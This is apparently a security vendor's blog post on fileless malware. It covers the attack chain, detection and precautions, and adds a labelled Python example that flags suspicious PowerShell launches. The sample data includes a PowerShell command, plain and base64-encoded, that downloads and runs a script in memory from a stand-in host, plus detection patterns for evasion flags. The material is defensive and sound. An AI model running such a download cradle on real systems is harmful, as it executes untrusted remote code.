Fileless Malware Attacks and How To Protect Yourself - Cerium Networks

Fileless Malware


Protecting Your System from Zero-Footprint Cyber-Attacks

Cybercriminals are continually on the lookout for ways to attack your system without being detected. An increasingly common tactic is the zero-footprint attack, also known as a fileless or macro attack. This type of attack does not install software on the computer, so many antivirus tools are likely to miss it. Reports indicate that zero-footprint attacks are ten times more likely to succeed than file-based attacks, and they estimate that over 75% of successful compromises in 2017 were fileless.

Zero-footprint attacks evade whitelisting by taking advantage of applications that are already installed on the system and are on the approved whitelist. These attacks typically rely on a user clicking a suspicious link or opening a malicious file; however, they don’t need to install detectable files on the computer’s hard drive to compromise the system. Instead, they run malicious code or launch scripts that infect endpoints directly from memory, without leaving easily discoverable artifacts behind.

Anatomy of a Zero-Footprint Attack

Here’s an example of how a zero-footprint attack works:

  1. A user clicks a link to a malicious website.
  2. The website loads Flash.
  3. Flash is used to open the Windows PowerShell utility.
  4. PowerShell downloads a script from a server and executes the script through the command line while operating in memory.
  5. The PowerShell script locates the user’s critical data and sends it to the attacker.

Detecting Zero-Footprint Attacks

Fortunately, the zero-footprint moniker is a misnomer. There are ways to detect malware even if it isn’t installed on your file system. Some antivirus software can spot the malicious attachment or link even when no executable file is installed. However, zero-footprint malware resides in RAM, and many antivirus programs only analyze the digital signatures of files stored on a hard drive to identify malicious files; they do NOT inspect memory directly, so fileless attacks often go undetected for longer.

Combatting Zero-Footprint Attacks

Here are some basic precautions you can follow to help secure your system and prevent zero-footprint attacks:

  • Apply all the latest security updates and patches to your operating system, and ensure that all software applications are patched and updated to their latest version.
  • Educate your users on the dangers of downloading email attachments or clicking on suspicious links.
  • Restrict access to administrative tools such as WMI, PowerShell, and AppleScript that cybercriminals can leverage for attacks.
  • Restrict the number of domain administrators who have full access to domain settings.
  • Harden your firewalls, endpoint protection, email security, and web blockers.
  • Employ behavior-based network security that enforces rules based on users’ actions rather than relying on signature-based malware detection.
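The following is an added example, not part of the original post or Cerium's tooling, that serves both the PowerShell step in the attack anatomy above and the behavior-based detection bullet: a small scorer over process-creation records that flags script hosts launched by browsers, Flash/plugin hosts or Office, together with download-and-run-in-memory traits on the command line. It goes one step beyond the text by also decoding a -EncodedCommand argument before matching. The record field names, parent-process list and sample events are constructed assumptions, not real telemetry.

```python
import base64
import re

# Parents that should not normally launch a script host: browsers, Flash/plugin hosts, Office.
SUSPICIOUS_PARENTS = ("plugin-container.exe", "flashplayer", "chrome.exe", "firefox.exe", "iexplore.exe", "winword.exe")
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
CRADLE_PATTERNS = [  # command-line traits of download-and-run-in-memory behaviour, matched case-insensitively
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", "remote download"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(xecutionpolicy|p)\s+bypass", "execution policy bypass"),
]
ENCODED_ARG = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

def score_event(ev):
    # Returns (score, reasons) for one process-creation record; non-script-host images score 0.
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    if image not in SCRIPT_HOSTS:
        return 0, []
    reasons = [f"script host spawned by {parent}"] if parent.startswith(SUSPICIOUS_PARENTS) else []
    m = ENCODED_ARG.search(ev["cmdline"])
    try:  # -EncodedCommand carries base64 of UTF-16LE text; recover it so it can be inspected too
        decoded = base64.b64decode(m.group(2), validate=True).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        decoded = ""
    if decoded:
        reasons.append("encoded command")
    for pattern, label in CRADLE_PATTERNS:  # check visible and decoded command text together
        if re.search(pattern, ev["cmdline"] + "\n" + decoded, re.IGNORECASE):
            reasons.append(label)
    return sum(3 if r.startswith("script host") else 1 for r in reasons), reasons  # odd parent weighs 3

def detect(events, threshold=2):
    # Alert on every record whose score reaches the threshold, as (index, score, reasons).
    scored = [(i, *score_event(ev)) for i, ev in enumerate(events)]
    return [(i, s, r) for i, s, r in scored if s >= threshold]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample records (Sysmon event 1 / Windows 4688 style), not real telemetry.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"parent": r"C:\Program Files\Mozilla Firefox\plugin-container.exe", "image": PS,
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""},
    {"parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE", "image": PS, "cmdline": "powershell.exe -enc " + ENCODED},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ipconfig"},
]
```

Running `detect(SAMPLE_EVENTS)` flags only the browser-spawned and Office-spawned PowerShell records; the scheduled backup script and the plain cmd.exe record score zero.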

No system for combatting zero-footprint attacks is foolproof; however, vigilance and robust threat prevention tools can slow down or derail cyberattackers and increase the probability that they will make mistakes that expose their presence or reveal their attack vector.
